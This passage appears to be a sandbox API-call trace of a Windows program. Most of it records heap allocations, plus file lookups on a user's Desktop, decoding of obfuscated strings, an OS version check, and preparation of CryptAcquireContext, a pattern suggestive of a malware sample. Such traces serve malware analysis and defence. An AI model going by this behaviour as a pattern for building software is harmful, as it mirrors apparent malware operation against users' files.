lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0090.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.207] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E hy.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 0x9a3b00 [0090.207] FindClose (in: hFindFile=0x9a3b00 | out: hFindFile=0x9a3b00) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0090.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.208] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.209] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0090.209] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.209] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.210] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.210] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.216] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.216] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0090.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0090.216] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.216] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, 